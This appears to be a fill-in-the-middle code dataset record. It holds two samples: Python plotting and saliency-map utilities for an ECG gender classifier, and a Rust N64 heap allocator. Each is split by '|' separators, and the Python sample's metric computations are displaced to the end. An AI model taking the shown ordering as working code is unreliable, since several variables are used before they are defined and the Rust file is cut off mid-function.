self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
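# Illustrative usage sketch (not part of the original module): how GuidedBackprop
# is typically driven; `model` (with predict_gender=True) and `signal` of shape
# (1, 1, signal_length) are placeholder names, and 0.1 is an arbitrary threshold.
#
#   gbp = GuidedBackprop(model)
#   saliency = gbp.generate_gradients(signal, target_class=1)
#   peaks = np.argwhere(np.abs(saliency) > 0.1)  # sample positions with high saliency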
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
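# Illustrative usage sketch: resolving the checkpoint files of a finished run.
# The save directory is a placeholder, and loading via torch.load assumes the
# files were written with torch.save.
#
#   model_path, solver_path = get_model_solver_paths('./saves/run_01', epoch=None)
#   model = torch.load(model_path)
#   solver = torch.load(solver_path)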
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
                     train_gender_loss, label='Train Gender loss')
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
    compute scores for accuracy, precision and recall
    args:
        gender (np.array): array of true gender class labels (0: male, 1: female)
        gender_pred (np.array): array of predicted gender class labels
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores | recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
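# Illustrative usage sketch: plot_gender_prediction expects 1-D label vectors,
# so raw model logits would be reduced with argmax first; `logits` and
# `gender_true` are placeholder names.
#
#   gender_pred = torch.argmax(logits, dim=1).numpy()
#   plot_gender_prediction(gender_true, gender_pred)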
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
                                   and what kind of labels (e.g. 'gender')
        color (str): Color for matplotlib text, axes labels and axes ticks
    """
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
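# Illustrative usage sketch: plotting the latent space of a validation batch.
# That the embedding is obtained via model.encoder(...) is an assumption about
# the model interface; `x_val` and `gender_val` are placeholder names.
#
#   with torch.no_grad():
#       z = model.encoder(x_val).flatten(start_dim=1).numpy()
#   plot_t_sne(z, gender_val, info=['validation set', 'gender'])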
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samples, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
    for i_sample in range(num_samples):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
        input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
            loss_history.append(loss.item())  # store a float, not the graph-holding tensor
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
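# Illustrative usage sketch: visualizing what a single convolutional filter of
# the model responds to; the layer/filter indices and the signal length are
# placeholders.
#
#   sig = create_signal_which_maximizes_activation(model, layer=0, filt=2,
#                                                  input_size=2048)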
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
        model (nn.Module): any model
        target_class (int): index of the class whose score is maximized
        input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show() | accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred) | random_line_split |
lib.rs | #![no_std]
#![allow(clippy::declare_interior_mutable_const)]
#![allow(clippy::cast_ptr_alignment)]
#![allow(clippy::needless_lifetimes)]
extern crate alloc;
mod const_init;
mod imp_static_array;
mod neighbors;
mod size_classes;
use const_init::ConstInit;
use core::alloc::{GlobalAlloc, Layout};
use core::cell::Cell;
use core::cmp;
use core::marker::Sync;
use core::ptr::{self, NonNull};
use core::sync::atomic::{AtomicI32, Ordering};
use imp_static_array as imp;
use memory_units::{size_of, ByteSize, Bytes, Pages, RoundUpTo, Words};
use neighbors::Neighbors;
pub(crate) struct AllocErr;
#[inline]
fn checked_round_up_to<T>(b: Bytes) -> Option<T>
where
T: ByteSize,
Bytes: RoundUpTo<T>,
{
if b.0.checked_add(T::BYTE_SIZE.0).is_none() {
None
} else {
Some(b.round_up_to())
}
}
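// Illustrative sketch (not part of the original crate): the helper above turns
// a byte count into whole words but returns None instead of wrapping on
// overflow near usize::MAX.
//
//     let ok: Option<Words> = checked_round_up_to(Bytes(13));           // Some(..)
//     let nope: Option<Words> = checked_round_up_to(Bytes(usize::MAX)); // None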
#[repr(C)]
#[derive(Default, Debug)]
struct CellHeader<'a> {
neighbors: Neighbors<'a, CellHeader<'a>>,
}
impl<'a> AsRef<Neighbors<'a, CellHeader<'a>>> for CellHeader<'a> {
fn as_ref(&self) -> &Neighbors<'a, CellHeader<'a>> {
&self.neighbors
}
}
unsafe impl<'a> neighbors::HasNeighbors<'a, CellHeader<'a>> for CellHeader<'a> {
#[inline]
unsafe fn next_checked(
neighbors: &Neighbors<'a, CellHeader<'a>>,
next: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if next.is_null() || CellHeader::next_cell_is_invalid(neighbors) {
None
} else {
Some(&*next)
}
}
#[inline]
unsafe fn prev_checked(
_neighbors: &Neighbors<'a, CellHeader<'a>>,
prev: *const CellHeader<'a>,
) -> Option<&'a CellHeader<'a>> {
if prev.is_null() {
None
} else {
Some(&*prev)
}
}
}
#[repr(C)]
#[derive(Debug)]
struct AllocatedCell<'a> {
header: CellHeader<'a>,
}
#[test]
fn allocated_cell_layout() {
assert_eq!(
size_of::<CellHeader>(),
size_of::<AllocatedCell>(),
"Safety and correctness depends on AllocatedCell being the same as CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
core::mem::align_of::<AllocatedCell>()
);
}
#[repr(C)]
#[derive(Debug)]
struct FreeCell<'a> {
header: CellHeader<'a>,
next_free_raw: Cell<*const FreeCell<'a>>,
}
#[test]
fn free_cell_layout() {
assert_eq!(
size_of::<CellHeader>() + Words(1),
size_of::<FreeCell>(),
"Safety and correctness depends on FreeCell being only one word larger than CellHeader"
);
assert_eq!(
core::mem::align_of::<CellHeader>(),
        core::mem::align_of::<FreeCell>()
);
}
impl<'a> CellHeader<'a> {
// ### Semantics of Low Bits in Neighbors Pointers
//
// If `self.neighbors.next_bit_1` is set, then the cell is allocated, and
// should never be in the free list. If the bit is not set, then this cell
// is free, and must be in the free list (or is in the process of being
// added to the free list).
//
// The `self.neighbors.next` pointer always points to the byte just *after*
// this cell. If the `self.neighbors.next_bit_2` bit is not set, then it
// points to the next cell. If that bit is set, then it points to the
// invalid memory that follows this cell.
fn is_allocated(&self) -> bool {
self.neighbors.get_next_bit_1()
}
fn is_free(&self) -> bool {
!self.is_allocated()
}
fn set_allocated(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_1();
}
fn set_free(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_1();
}
fn next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) -> bool {
neighbors.get_next_bit_2()
}
fn set_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.set_next_bit_2();
}
fn clear_next_cell_is_invalid(neighbors: &Neighbors<'a, Self>) {
neighbors.clear_next_bit_2();
}
fn size(&self) -> Bytes {
let data = unsafe { (self as *const CellHeader<'a>).offset(1) };
let data = data as usize;
let next = self.neighbors.next_unchecked();
let next = next as usize;
Bytes(next - data)
}
fn as_free_cell(&self) -> Option<&FreeCell<'a>> {
if self.is_free() {
Some(unsafe { &*(self as *const CellHeader as *const FreeCell) })
} else {
None
}
}
// Get a pointer to this cell's data without regard to whether this cell is
// allocated or free.
unsafe fn unchecked_data(&self) -> *const u8 {
(self as *const CellHeader).offset(1) as *const u8
}
// Is this cell aligned to the given power-of-2 alignment?
fn is_aligned_to<B: Into<Bytes>>(&self, align: B) -> bool {
let align = align.into();
let data = unsafe { self.unchecked_data() } as usize;
data & (align.0 - 1) == 0
}
}
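// Illustrative sketch (not part of the original crate) of the layout described
// in the comments above, for a cell whose header starts at 0x1000 on a 64-bit
// target and assuming Neighbors stores two pointers (all numbers made up):
//
//     header:          0x1000 .. 0x1010
//     data:            0x1010 .. 0x1040
//     neighbors.next:  0x1040            (the byte just after this cell)
//     size()        == 0x1040 - 0x1010 == Bytes(48)
//     next_bit_1 == 0 -> the cell is free and must be in the free list
//     next_bit_2 == 1 -> 0x1040 is invalid memory, not another CellHeader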
impl<'a> FreeCell<'a> {
// Low bits in `FreeCell::next_free_raw`.
//
// If `NEXT_FREE_CELL_CAN_MERGE` is set, then the following invariants hold
// true:
//
// * `FreeCell::next_free_raw` (and'd with the mask) is not null.
// * `FreeCell::next_free_raw` is the adjacent `CellHeader::prev_cell_raw`.
//
// Therefore, this free cell can be merged into a single, larger, contiguous
// free cell with its previous neighbor, which is also the next cell in the
// free list.
const NEXT_FREE_CELL_CAN_MERGE: usize = 0b01;
const _RESERVED: usize = 0b10;
const MASK: usize = !0b11;
fn next_free_can_merge(&self) -> bool {
self.next_free_raw.get() as usize & Self::NEXT_FREE_CELL_CAN_MERGE != 0
}
fn set_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free | Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn clear_next_free_can_merge(&self) {
let next_free = self.next_free_raw.get() as usize;
let next_free = next_free & !Self::NEXT_FREE_CELL_CAN_MERGE;
self.next_free_raw.set(next_free as *const FreeCell);
}
fn next_free(&self) -> *const FreeCell<'a> {
let next_free = self.next_free_raw.get() as usize & Self::MASK;
next_free as *const FreeCell<'a>
}
unsafe fn from_uninitialized(
raw: NonNull<u8>,
_size: Bytes,
next_free: Option<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> *const FreeCell<'a> {
let next_free = next_free.unwrap_or(ptr::null_mut());
let raw = raw.as_ptr() as *mut FreeCell;
ptr::write(
raw,
FreeCell {
header: CellHeader::default(),
next_free_raw: Cell::new(next_free),
},
);
raw
}
fn as_allocated_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &AllocatedCell<'a> {
CellHeader::set_allocated(&self.header.neighbors);
unsafe { &*(self as *const FreeCell as *const AllocatedCell) }
}
// Try and satisfy the given allocation request with this cell.
fn try_alloc<'b>(
&'b self,
previous: &'b Cell<*const FreeCell<'a>>,
alloc_size: Words,
align: Bytes,
policy: &dyn AllocPolicy<'a>,
) -> Option<&'b AllocatedCell<'a>> {
// First, do a quick check that this cell can hold an allocation of the
// requested size.
let size: Bytes = alloc_size.into();
if self.header.size() < size {
return None;
}
// Next, try and allocate by splitting this cell in two, and returning
// the second half.
//
// We allocate from the end of this cell, rather than the beginning,
// because it allows us to satisfy alignment requests. Since we can
// choose to split at some alignment and return the aligned cell at the
// end.
let next = self.header.neighbors.next_unchecked() as usize;
let split_and_aligned = (next - size.0) & !(align.0 - 1);
let data = unsafe { self.header.unchecked_data() } as usize;
let min_cell_size: Bytes = policy.min_cell_size(alloc_size).into();
if data + size_of::<CellHeader>().0 + min_cell_size.0 <= split_and_aligned {
let split_cell_head = split_and_aligned - size_of::<CellHeader>().0;
let split_cell = unsafe {
&*FreeCell::from_uninitialized(
unchecked_unwrap(NonNull::new(split_cell_head as *mut u8)),
Bytes(next - split_cell_head) - size_of::<CellHeader>(),
None,
policy,
)
};
Neighbors::append(&self.header, &split_cell.header);
self.clear_next_free_can_merge();
if CellHeader::next_cell_is_invalid(&self.header.neighbors) {
CellHeader::clear_next_cell_is_invalid(&self.header.neighbors);
CellHeader::set_next_cell_is_invalid(&split_cell.header.neighbors);
}
return Some(split_cell.as_allocated_cell(policy));
}
// There isn't enough room to split this cell and still satisfy the
// requested allocation. Because of the early check, we know this cell
// is large enough to fit the requested size, but is the cell's data | // properly aligned?
if self.header.is_aligned_to(align) {
previous.set(self.next_free());
let allocated = self.as_allocated_cell(policy);
return Some(allocated);
}
None
}
fn insert_into_free_list<'b>(
&'b self,
head: &'b Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> &'b Cell<*const FreeCell<'a>> {
self.next_free_raw.set(head.get());
head.set(self);
head
}
}
impl<'a> AllocatedCell<'a> {
unsafe fn as_free_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &FreeCell<'a> {
CellHeader::set_free(&self.header.neighbors);
let free: &FreeCell = &*(self as *const AllocatedCell as *const FreeCell);
free.next_free_raw.set(ptr::null_mut());
free
}
fn data(&self) -> *const u8 {
let cell = &self.header as *const CellHeader;
unsafe { cell.offset(1) as *const u8 }
}
}
trait AllocPolicy<'a> {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr>;
fn min_cell_size(&self, alloc_size: Words) -> Words;
fn should_merge_adjacent_free_cells(&self) -> bool;
}
struct LargeAllocPolicy;
static LARGE_ALLOC_POLICY: LargeAllocPolicy = LargeAllocPolicy;
impl LargeAllocPolicy {
const MIN_CELL_SIZE: Words = Words(size_classes::SizeClasses::NUM_SIZE_CLASSES * 2);
}
impl<'a> AllocPolicy<'a> for LargeAllocPolicy {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr> {
// To assure that an allocation will always succeed after refilling the
// free list with this new cell, make sure that we allocate enough to
// fulfill the requested alignment, and still have the minimum cell size
// left over.
let size: Bytes = cmp::max(size.into(), (align + Self::MIN_CELL_SIZE) * Words(2));
let pages: Pages = (size + size_of::<CellHeader>()).round_up_to();
let new_pages = imp::alloc_pages(pages)?;
let allocated_size: Bytes = pages.into();
let free_cell = &*FreeCell::from_uninitialized(
new_pages,
allocated_size - size_of::<CellHeader>(),
None,
self as &dyn AllocPolicy<'a>,
);
let next_cell = (new_pages.as_ptr() as *const u8).add(allocated_size.0);
free_cell
.header
.neighbors
.set_next(next_cell as *const CellHeader);
CellHeader::set_next_cell_is_invalid(&free_cell.header.neighbors);
Ok(free_cell)
}
fn min_cell_size(&self, _alloc_size: Words) -> Words {
Self::MIN_CELL_SIZE
}
fn should_merge_adjacent_free_cells(&self) -> bool {
true
}
}
#[inline]
unsafe fn unchecked_unwrap<T>(o: Option<T>) -> T {
match o {
Some(t) => t,
None => core::hint::unreachable_unchecked(),
}
}
unsafe fn walk_free_list<'a, F, T>(
head: &Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
mut f: F,
) -> Result<T, AllocErr>
where
F: FnMut(&Cell<*const FreeCell<'a>>, &FreeCell<'a>) -> Option<T>,
{
// The previous cell in the free list (not to be confused with the current
// cell's previously _adjacent_ cell).
let previous_free = head;
loop {
let current_free = previous_free.get();
if current_free.is_null() {
return Err(AllocErr);
}
let current_free = Cell::new(current_free);
// Now check if this cell can merge with the next cell in the free
// list.
//
// We don't re-check `policy.should_merge_adjacent_free_cells()` because
// the `NEXT_FREE_CELL_CAN_MERGE` bit only gets set after checking with
// the policy.
while (*current_free.get()).next_free_can_merge() {
let current = &*current_free.get();
current.clear_next_free_can_merge();
let prev_neighbor = unchecked_unwrap(
current
.header
.neighbors
.prev()
.and_then(|p| p.as_free_cell()),
);
current.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(¤t.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev_neighbor.header.neighbors);
}
previous_free.set(prev_neighbor);
current_free.set(prev_neighbor);
}
if let Some(result) = f(previous_free, &*current_free.get()) {
return Ok(result);
}
previous_free.set(&*(*current_free.get()).next_free_raw.get());
}
}
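// Illustrative sketch (not part of the original crate) of the callback
// contract: return Some(..) to stop the walk with a result, None to keep
// walking. alloc_first_fit below drives walk_free_list in exactly this way.
//
//     let found = unsafe {
//         walk_free_list(head, policy, |_previous, cell| {
//             if cell.header.size() >= Bytes(32) {
//                 Some(cell as *const FreeCell)
//             } else {
//                 None
//             }
//         })
//     };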
/// Do a first-fit allocation from the given free list.
unsafe fn alloc_first_fit<'a>(
size: Words,
align: Bytes,
head: &Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
walk_free_list(head, policy, |previous, current| {
if let Some(allocated) = current.try_alloc(previous, size, align, policy) {
return Some(unchecked_unwrap(NonNull::new(allocated.data() as *mut u8)));
}
None
})
}
unsafe fn alloc_with_refill<'a, 'b>(
size: Words,
align: Bytes,
head: &'b Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
if let Ok(result) = alloc_first_fit(size, align, head, policy) {
return Ok(result);
}
let cell = policy.new_cell_for_free_list(size, align)?;
let head = (*cell).insert_into_free_list(head, policy);
alloc_first_fit(size, align, head, policy)
}
/// An n64 allocator.
///
/// # Safety
///
/// When used in unix environments, the allocator must not be moved in memory.
/// That is typically not an issue if you're just using it as a `static` global
/// allocator.
pub struct N64Alloc<'a> {
head: imp::Exclusive<*const FreeCell<'a>>,
size_classes: size_classes::SizeClasses<'a>,
}
unsafe impl<'a> Sync for N64Alloc<'a> {}
impl<'a> ConstInit for N64Alloc<'a> {
const INIT: N64Alloc<'a> = N64Alloc {
head: imp::Exclusive::INIT,
size_classes: size_classes::SizeClasses::INIT,
};
}
impl<'a> N64Alloc<'a> {
/// An initial `const` default construction of a `N64Alloc` allocator.
///
/// This is usable for initializing `static`s that get set as the global
/// allocator.
pub const INIT: Self = <Self as ConstInit>::INIT;
unsafe fn with_free_list_and_policy_for_size<F, T>(&self, size: Words, align: Bytes, f: F) -> T
where
F: for<'b> FnOnce(&'b Cell<*const FreeCell<'a>>, &'b dyn AllocPolicy<'a>) -> T,
{
if align <= size_of::<usize>() {
if let Some(head) = self.size_classes.get(size) {
let policy = size_classes::SizeClassAllocPolicy(&self.head);
let policy = &policy as &dyn AllocPolicy<'a>;
return head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
});
}
}
